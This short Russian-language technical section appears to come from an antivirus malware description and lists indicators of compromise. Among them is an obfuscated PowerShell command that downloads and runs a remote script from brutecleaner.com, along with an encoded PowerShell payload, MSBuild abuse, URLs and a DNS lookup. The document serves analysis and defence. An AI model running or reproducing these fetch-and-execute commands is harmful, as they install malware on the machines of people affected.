Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('ht'+'tp://brutecleaner.com/Sheet.ps1')
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- http://br####leaner.com/Sheet.ps1
- http://br####leaner.com/blm2.txt
- DNS ASK br####leaner.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('ht'+'tp://brutecleaner.com/Sheet.ps1')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAF...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'